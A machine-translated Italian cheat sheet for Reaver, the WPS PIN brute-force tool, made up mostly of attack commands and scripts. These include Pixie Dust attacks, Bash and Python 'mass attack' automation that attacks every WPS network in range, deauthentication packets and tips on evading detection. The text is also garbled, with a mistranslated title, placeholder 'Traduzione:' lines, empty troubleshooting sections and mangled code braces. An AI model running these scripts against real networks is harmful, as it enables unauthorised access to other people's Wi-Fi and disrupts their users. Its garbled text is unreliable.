FRONTMATTER_30_# Foglio di guarnizione¶
Traduzione: HTML_TAG_20_ Tutti i comandi_HTML_TAG_21 __HTML_TAG_22_📄 Generare PDF
Panoramica¶
Reaver è uno strumento di sicurezza wireless specializzato progettato per sfruttare le vulnerabilità nelle implementazioni Wi-Fi Protected Setup (WPS) per recuperare passphrases WPA/WPA2. Sviluppato da Craig Heffner, Reaver implementa un attacco di forza bruta contro l'autenticazione WPS PIN, sfruttando un difetto di progettazione critica nel protocollo WPS che consente agli aggressori di recuperare il PIN in modo significativo meno tentativi rispetto al massimo teorico. Questa vulnerabilità, nota come attacco WPS PIN, colpisce milioni di router wireless e punti di accesso in tutto il mondo.
La debolezza fondamentale che Reaver sfrutta è il modo in cui WPS convalida l'autenticazione PIN. Invece di convalidare l'intero PIN a 8 cifre come unità singola, WPS convalida il PIN in due metà separate, riducendo efficacemente lo spazio di ricerca da 10^8 possibili combinazioni a circa 11.000 tentativi. Questo difetto di progettazione, combinato con il fatto che la maggior parte delle implementazioni WPS non implementano i meccanismi di limitazione di tasso corretto o di blocco, rende possibile recuperare i PIN WPS e successivamente la passphrase WPA/WPA2 in una questione di ore.
Reaver è diventato uno strumento essenziale per le valutazioni di sicurezza wireless e test di penetrazione, dimostrando le carenze di sicurezza intrinseche nelle implementazioni WPS. L'efficacia dello strumento ha portato alla diffusa consapevolezza delle vulnerabilità WPS e ha influenzato molte organizzazioni a disabilitare la funzionalità WPS sulla loro infrastruttura wireless. Nonostante le contromisure implementate da alcuni produttori, Reaver rimane pertinente per testare i sistemi legacy e identificare le reti wireless vulnerabili durante le valutazioni di sicurezza.
Installazione¶
## Package Manager Installazione¶
Installazione di Reaver attraverso i gestori dei pacchetti di sistema:
# Ubuntu/Debian installation
sudo apt update
sudo apt install reaver
# Kali Linux (pre-installed)
reaver --help
# CentOS/RHEL installation
sudo yum install epel-release
sudo yum install reaver
# Arch Linux installation
sudo pacman -S reaver
# Verify installation
reaver --version
which reaver
Source Compilation¶
Compiling Reaver dal codice sorgente:
# Install dependencies
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
# Clone repository
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
cd reaver-wps-fork-t6x
# Navigate to source directory
cd src
# Configure and compile
./configure
make
# Install system-wide
sudo make install
# Verify installation
reaver --version
Installazione Docker¶
# Create Dockerfile for Reaver
cat > Dockerfile << 'EOF'
FROM kalilinux/kali-rolling
RUN apt-get update && apt-get install -y reaver aircrack-ng
WORKDIR /workspace
CMD ["/bin/bash"]
EOF
# Build container
docker build -t reaver-toolkit .
# Run with network access
docker run -it --net=host --privileged reaver-toolkit
# Mount workspace
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkit
Uso di base¶
Target Discovery¶
Alla scoperta dei punti di accesso WPS:
# Put wireless interface in monitor mode
sudo airmon-ng start wlan0
# Scan for WPS-enabled networks
wash -i wlan0mon
# Detailed WPS scan
wash -i wlan0mon -C
# Scan specific channel
wash -i wlan0mon -c 6
# Save scan results
wash -i wlan0mon -o wps_targets.txt
# Show only networks with WPS enabled
wash -i wlan0mon|grep "Yes"
Basic WPS Attacco¶
Esecuzione di base WPS PIN attacco forza brute:
# Basic Reaver attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Attack with specific channel
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
# Attack with delay between attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
# Attack with session file
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
# Resume previous session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
Opzioni di attacco avanzate¶
Configurazioni di attacco Advanced Reaver:
# Ignore lock warnings
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# No NACKS (for some routers)
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
# Disable associated requests
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
# Use small DH keys
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
# Specify timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vv
Caratteristiche avanzate¶
PIN Management¶
Gestione dei tentativi e del recupero di WPS PIN:
# Start from specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
# Use PIN from file
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
# Generate PIN list
crunch 8 8 0123456789 > pin_list.txt
# Check specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
# Show current PIN attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv|grep "Trying pin"
Gestione sessione¶
Gestione delle sessioni di attacco Reaver:
# Create named session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
# List existing sessions
ls ~/.reaver/
# View session details
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
# Delete session
rm ~/.reaver/target1.wpc
# Backup session
cp ~/.reaver/target1.wpc target1_backup.wpc
Rate Limiting and Timing¶
Controllo tempistiche di attacco e limite di velocità:
# Delay between PIN attempts (seconds)
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
# Delay after 10 failures
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
# Maximum number of attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
# Timeout for each attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
# Recurring delay pattern
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vv
Attacco della polvere di Pixie¶
Implementing Pixie Dust (offline)
# Enable Pixie Dust attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
# Pixie Dust with specific parameters
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
# Save Pixie Dust data
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
# Use external Pixie Dust tool
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
# Automated Pixie Dust with OneShot
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -K
Automation Scripts¶
Mass WPS Testing¶
#!/bin/bash
# Mass WPS testing script
INTERFACE="wlan0mon"
RESULTS_DIR="reaver_results"
DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
# Discover WPS targets
echo "Discovering WPS-enabled targets..."
wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
# Extract target information
grep "Yes" $RESULTS_DIR/wps_targets.txt|while read line; do
BSSID=$(echo $line|awk '\\\\{print $1\\\\}')
CHANNEL=$(echo $line|awk '\\\\{print $2\\\\}')
ESSID=$(echo $line|awk '\\\\{print $6\\\\}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.log"
SESSION_FILE="$RESULTS_DIR/session_$\\\\{BSSID//:/_\\\\}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results."
PIN automatizzato Recupero¶
#!/usr/bin/env python3
# Automated WPS PIN recovery script
import subprocess
import re
import time
import json
from datetime import datetime
class ReaverAutomation:
def __init__(self, interface):
self.interface = interface
self.results = \\\\{\\\\}
self.active_attacks = \\\\{\\\\}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
\\\\}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: \\\\{e\\\\}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return \\\\{
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
else:
return \\\\{'success': False, 'method': 'pixie_dust'\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': str(e)\\\\}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_\\\\{target['bssid'].replace(':', '_')\\\\}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return \\\\{'success': False, 'method': 'brute_force', 'error': 'timeout'\\\\}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return \\\\{
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for \\\\{target['bssid']\\\\}")
time.sleep(60) # Wait before continuing
process.terminate()
return \\\\{'success': False, 'method': 'brute_force'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'brute_force', 'error': str(e)\\\\}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking \\\\{target['essid']\\\\} (\\\\{target['bssid']\\\\})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for \\\\{target['bssid']\\\\}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for \\\\{target['bssid']\\\\}")
else:
print(f"FAILED: All attacks failed for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found \\\\{len(targets)\\\\} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = \\\\{
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
\\\\}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: \\\\{report['successful_attacks']\\\\}/\\\\{report['total_targets']\\\\}")
# Usage
if __name__ == "__main__":
automation = ReaverAutomation("wlan0mon")
automation.run_mass_attack()
WPS Vulnerability Scanner¶
#!/usr/bin/env python3
# WPS vulnerability scanner
import subprocess
import re
import csv
from datetime import datetime
class WPSScanner:
def __init__(self, interface):
self.interface = interface
self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
\\\\}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: \\\\{e\\\\}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = \\\\{
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
\\\\}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found \\\\{len(networks)\\\\} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found \\\\{len(wps_networks)\\\\} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: \\\\{critical\\\\}")
print(f"High: \\\\{high\\\\}")
print(f"Medium: \\\\{medium\\\\}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
# Usage
if __name__ == "__main__":
scanner = WPSScanner("wlan0mon")
scanner.run_assessment()
Esempi di integrazione¶
Aircrack-ng Integrazione¶
#!/bin/bash
# Reaver and Aircrack-ng integration
INTERFACE="wlan0mon"
TARGET_BSSID="00:11:22:33:44:55"
TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
# Start airodump-ng to capture handshakes
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID $INTERFACE &
AIRODUMP_PID=$!
# Start Reaver attack
reaver -i $INTERFACE -b $TARGET_BSSID -c $TARGET_CHANNEL -vv &
REAVER_PID=$!
# Monitor for successful WPS crack
while kill -0 $REAVER_PID 2>/dev/null; do
if grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS PIN recovered!"
kill $REAVER_PID
break
fi
sleep 10
done
# If WPS failed, try WPA handshake capture
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed"
Kismet Integrazione¶
#!/usr/bin/env python3
# Reaver and Kismet integration
import subprocess
import json
import time
class ReaverKismetIntegration:
def __init__(self, kismet_server="localhost:2501"):
self.kismet_server = kismet_server
self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://\\\\{self.kismet_server\\\\}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append(\\\\{
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', \\\\{\\\\}).get('kismet.common.signal.last_signal', 0)
\\\\})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: \\\\{e\\\\}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'pixie_dust',
'output': result.stdout
\\\\}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'brute_force',
'output': result.stdout
\\\\}
else:
return \\\\{'success': False, 'output': result.stdout\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'error': str(e)\\\\}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found \\\\{len(devices)\\\\} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking \\\\{len(targets)\\\\} prioritized targets")
for target in targets:
print(f"Attacking \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: \\\\{target['ssid']\\\\} cracked via \\\\{result['method']\\\\}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"\\\\{time.ctime()\\\\}: \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\}) - \\\\{result['method']\\\\}\n")
else:
print(f"FAILED: \\\\{target['ssid']\\\\} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
# Usage
if __name__ == "__main__":
integration = ReaverKismetIntegration()
integration.run_integrated_attack("wlan0mon")
Risoluzione dei problemi¶
Questioni comuni¶
** Problemi di interfaccia: ** Traduzione:
WPS Lock Issues¶
Traduzione:
** Problemi di associazione:** Traduzione:
Debugging¶
Abilita debug dettagliato e logging:
# Maximum verbosity
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Log to file
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1|tee reaver.log
# Monitor system logs
tail -f /var/log/syslog|grep reaver
# Check wireless driver logs
dmesg|grep -i wireless
# Monitor network traffic
tcpdump -i wlan0mon -w reaver_traffic.pcap
Considerazioni di sicurezza¶
Considerazioni giuridiche ed etiche¶
**Solo test autorizzati: ** - No. Solo le reti di prova che possiedi o hai il permesso esplicito di testare - Ottenere l'autorizzazione scritta prima di condurre attacchi WPS - Seguire le leggi e le normative locali in materia di test di sicurezza wireless - Rispetto della privacy e riservatezza del traffico di rete - Documentare tutte le attività di test per la conformità
**Divulgazione responsabile: E' una cosa da fare. - Segnala vulnerabilità ai proprietari di rete - Fornire una guida di bonifica - Consentire tempo ragionevole per correzioni - Seguire pratiche di divulgazione coordinate - Mantenere la riservatezza durante il processo di divulgazione
Sicurezza operativa¶
**Evita di rilevamento: ** - Utilizzare ritardi appropriati tra i tentativi - Monitor per le risposte difensive - Evitare le ore di utilizzo del picco - Utilizzare antenne direzionali quando possibile - Attuazione di misure di sicurezza operative adeguate
** Impatto di rete ** - Minimizzare le interruzioni agli utenti legittimi - Evitare attacchi di deautenzione eccessiva - Monitorare l'impatto delle prestazioni della rete - Utilizzare livelli di potenza adeguati - Rispetto dei requisiti di disponibilità della rete
Referenze¶
- [Reaver GitHub Repository]
- Specifica del protocollo WPS_
- WPS Security Vulnerabilities
- Guida di prova di sicurezza senza fili
- IEEE 802.11 Standards